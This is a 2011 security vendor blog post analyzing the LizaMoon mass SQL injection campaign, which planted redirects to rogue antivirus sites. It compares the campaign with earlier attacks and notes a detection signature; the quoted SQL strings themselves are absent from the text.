Analyzing a Mass SQL Injection Attack - Lizamoon

Posted by John Kuhn on March 31, 2011 at 5:34 PM EDT.

Over the last few days we have been tracking a mass SQL injection attack that was first blogged by Websense On March 29th, These types of threats are nothing new to us in IBM Managed Security Services as we’ve been tracking similar attacks for years. We are not seeing near the volume compared to the “asprox” and “dnf666” attacks.  The reason for this is simple, the attacks seem to source from a few choice IPs which corresponds back to the site being injected into the victims database.  The Asprox SQL Injection attack, for instance, utilized a botnet to do the mass injection, giving them far more reach and bandwidth.

This new wave of attacks was named LizaMoon from a URL that was ultimately injected into the SQL tables of the target site. These attacks use a different technique then witnessed previously however, they still achieve the same goal - redirection to a malicious website.

The SQL Injection in its raw form looks like this:

Once ASCII codes are decoded, the SQL string translates to:

If the injection is successful, this snippet of code would be riddled throughout the compromised database of the site, redirecting unsuspecting Internet users to their malicious payload. The result is an attempt to get the victims of the drive by download to install RougeAV, something the security industry has been battling for years now.

Protection from this attack comes from the signature SQL_Injection for our Proventia™ products.

We will be tracking this attack and providing any additional details in the future.